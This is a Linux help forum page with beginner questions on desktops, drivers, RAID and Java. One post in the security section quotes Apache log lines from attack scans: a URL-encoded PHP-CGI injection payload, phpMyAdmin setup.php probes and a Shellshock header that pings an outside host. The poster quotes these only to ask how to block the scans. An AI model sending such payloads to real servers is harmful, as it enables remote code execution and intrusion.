Welcome, Guest
You have to register before you can post on our site.

Username/Email:
  

Password
  





Search Forums

(Advanced Search)

Forum Statistics
» Members: 5,095
» Latest member: WandaEveline
» Forum threads: 4,026
» Forum posts: 16,399

Full Statistics

Online Users
There are currently 73 online users.
» 0 Member(s) | 71 Guest(s)
Applebot, Bing

Latest Threads
Im back.....
Forum: Hello
Last Post: anyweb
2021-01-17, 11:36 AM
» Replies: 1
» Views: 1,168
add mp3 plugin to xmms in...
Forum: Fedora
Last Post: anyweb
2021-01-17, 11:30 AM
» Replies: 11
» Views: 31,151
Configuring VSFTPd Server
Forum: FTP Server
Last Post: Johnbaca
2020-10-14, 10:25 AM
» Replies: 32
» Views: 53,350
Wolf won't play sound!
Forum: Game Problems
Last Post: Guest
2020-10-03, 05:51 PM
» Replies: 1
» Views: 13,258
Using git + python
Forum: How Do I?
Last Post: Clueless puppy
2020-08-21, 04:37 PM
» Replies: 0
» Views: 4,353
what does your nick mean ...
Forum: Hello
Last Post: volt
2020-08-06, 03:25 PM
» Replies: 28
» Views: 20,437
CentOS vs.?
Forum: Just Starting Linux
Last Post: volt
2020-08-06, 02:29 PM
» Replies: 0
» Views: 4,284
I displaced my linux part...
Forum: Just Starting Linux
Last Post: MarvoIke
2020-05-20, 09:05 PM
» Replies: 0
» Views: 680
Argument errors help plea...
Forum: How Do I?
Last Post: illiterate_newb
2020-02-23, 07:02 PM
» Replies: 0
» Views: 1,077
Drive Question
Forum: How Do I?
Last Post: anyweb
2020-01-13, 08:29 PM
» Replies: 1
» Views: 947

 
  KDE "blurred" menus
Posted by: simPod - 2014-10-20, 07:01 PM - Forum: How Do I? - No Replies


I installed KDE to my Debian on my VPS but those menus look blurred and are not readable very well, see the image. How can I fix it? Thank you

 

[Image: EyzDOx1.png]

Print this item

  Prevent and block scan? (w00tw00t, tmUnblock.cgi etc)
Posted by: moon - 2014-09-26, 12:09 AM - Forum: Security and Firewalls - Replies (1)


Hi, I have often these lines in /var/log/apache2/access.log:

 

185.27.36.67 - - [25/Sep/2014:12:25:46 +0200] "POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 404 393 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

 

58.241.61.162 - - [25/Sep/2014:12:30:57 +0200] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 431 "-" "ZmEu"

 

58.241.61.162 - - [25/Sep/2014:12:30:58 +0200] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 421 "-" "ZmEu"

 

58.241.61.162 - - [25/Sep/2014:12:30:59 +0200] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 401 580 "-" "ZmEu"

 

58.241.61.162 - - [25/Sep/2014:12:31:00 +0200] "GET /pma/scripts/setup.php HTTP/1.1" 404 415 "-" "ZmEu"

 

58.241.61.162 - - [25/Sep/2014:12:31:00 +0200] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 419 "-" "ZmEu"

 

58.241.61.162 - - [25/Sep/2014:12:31:05 +0200] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 419 "-" "ZmEu"

 

211.24.56.24 - - [25/Sep/2014:14:53:55 +0200] "GET /tmUnblock.cgi HTTP/1.1" 400 431 "-" "-"

 

89.207.135.125 - - [25/Sep/2014:15:23:54 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 427 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"

 

What is the best way to prevent this and block the scans?

 

Thank you very much in advance

Print this item

  cmake 2.8
Posted by: alimahboobi007 - 2014-07-22, 08:58 AM - Forum: CentOS - Replies (1)


Hi 

I installed Cmake successfully .and now I want to work with it but i dont know how??

please help me?!

does it have any visual interface or i have to use it with terminal??

 

help meeee[img]<___base_url___>//public/style_emoticons/default/sad.png[/img]

Print this item

  Flash for Chrome-pepper or not?
Posted by: WBBear - 2014-07-10, 11:39 PM - Forum: How Do I? - Replies (1)


I'm running Mint 16 Petra using Chromium as the browser.

I'm not sure what the true problem is.

I can watch videos on the YouTube site just fine...

But, when I go to watch videos from other sites (Crackle or Wimp) or any embedded videos they come up all distorted and scrunched up with odd colors.

When I go to check my chrome flash plugins, I have two different versions.

/usr/lib/adobe-flashplugin/libflashplayer.so

/opt/mint-flashplugin-11/libflashplayer.so

Neither one is the "pepperflash" that I'm told that I need for Chronium.

Any idea how I can get this to work right?

Thanks

Print this item

  mystery raid recovers
Posted by: 1ajs - 2014-06-23, 12:13 AM - Forum: How Do I? - No Replies


hi been a while since been on here. anyhow

 

so i got several stacks of different drives from a bunch of different raid collections i dunno what kinda of raids they are other then they are taped together from what ever they were pulled out of.

no idea if they are hardware or software

 

got some sorta server i was guna put linux on to see if i could see the drives not sure how i should go about this? or am i pissing up a tree?

[Image: amm5.jpg]
[Image: twnpi.jpg]
[Image: jhno.jpg]

Print this item

  Creating a linux only network
Posted by: supersayian - 2014-05-29, 05:41 PM - Forum: Just Starting Linux - Replies (1)


Hi!

 

I have been a windows user for many years. I even have a windows server in my house. I have even dabbled in linux also. What I have been trying to do is switch from windows to linux completely. Meaning no windows at all. I am looking to create a linux server that will offer the same functionality of a windows server but without the windows. I want to use this server for authentication, file & print services. Using only the linux components and I don't want to use samba! I will use what ever management tools there are in linux console, graphical that can be used to manage the server.

 

I just want away from windows and microsoft!!!

 

The goals are

 

1. Authentication

2. user management

3. limiting access to files and directories

4. sharing printers on the network.

 

Can this be done by linux or should I just stick with windows?

 

My distro of choice is Oracle linux but can use centos if I have to.

 

Print this item

  Install Mizio
Posted by: Y4kuzi - 2014-04-08, 09:19 PM - Forum: How Do I? - No Replies


Hey guys!

 

Anyone know how to install Mizio on Linux?

It can be found at http://sourceforge.net/projects/mizio but I can't figure out how to install it.

 

Or does anyone know a better proxy finder for Linux? Preferably with IRC support.

 

Thanx in advance!

Print this item

  How to install JDK and Intellij IDEA on ARM/Samsung series 3
Posted by: Jpeppa - 2014-03-06, 03:53 AM - Forum: Just Starting Linux - No Replies


Hello all!

 

So I am very, very new to Linux.  I am also new-ish to coding.  I'm currently learning Java and purchased a Samsung series 3 chromebook for the sole purpose of practising code (eventually moving to slick 3d).

 

I have JUST installed XFCE using crouton and have gotten Firefox using the Synaptic Package Manager, woohoo!

 

I would like to find out how/which JDK I need for this device and how to install Intellij IDEA.  I've tried searching around for a little while now and feel a bit overwhelmed with all the information regarding this, not only new OS, but new architecture (ARM).

 

Basically my main goals are to be able to get the proper JDK and a Java IDE up and running.  I have read that Intellij IDEA may or may not be available yet for the ARM processors in which case using Eclipse would be just as fine.

 

Any help is much appreciated!  Thank you in advanced!

Print this item

  Linux Noob with Mint Olivia Cinnamon installed on Sony Vaio P-Series... HELP!
Posted by: EasyE209 - 2014-02-15, 06:05 PM - Forum: How Do I? - Replies (2)


Hi all,

 

I am completely new to Linux, but have some how managed to install (from USB) Linux Mint Olivia Cinnamon onto my Sony Vaio VGN-P11Z, which I am aware is a somewhat awkward, niche piece of hardware at the best of times.

 

My aim is to optimise it a bit and then install a few bits of software. It's rather laggy at the mo, and I'm pretty sure I need video drivers for the GMA 500 graphics. How do I install drivers?! I'm reading webpages talking about 'Additional Drivers' in 'Admin', which aren't even there on my install. :/

 

Is there somewhere I can learn the basic of driver installs etc for Linux, and this version in particular. I'm not having too much luck in my web searches.

 

Sorry for waffling.

 

Cheers!

Print this item

  Gnome and KDE conflict
Posted by: DamagePlanX - 2014-02-11, 09:41 PM - Forum: Just Starting Linux - Replies (1)


Hi

 

I installed KDE on a box that had gnome running already.  Now I've got some weird issues going on.  I'll try and give as much detail as I can.

 

I recently spun up a Debian 7.4 box and changed my sources to jessie.  Then I ran apt-get update, apt-get upgrade and apt-get dist-upgrade.  Once up to date I ran apt-get install kde-full.  At the end of that install I was prompted to choose my default login manager so I chose kdm because I wanted to switch to KDE exclusively.

 

Once I rebooted neither desktop launched automatically I got some errors about dependencies so I ran apt-get upgrade -f.  After another reboot my machine boots into gnome but there are serious graphical glitches and some items and text aren't appearing.  I think this is due to both shells running at once.

 

How can I get my machine to boot into kde on startup?

How can I fully remove gnome once that's done?

 

Thanks and please let me know if you need additional info.

 

EDIT: I got into KDE by switching sessions but I've still got some graphical glitches.  How do I make sure gnome isn't running and as above, ideally remove it completely?

Print this item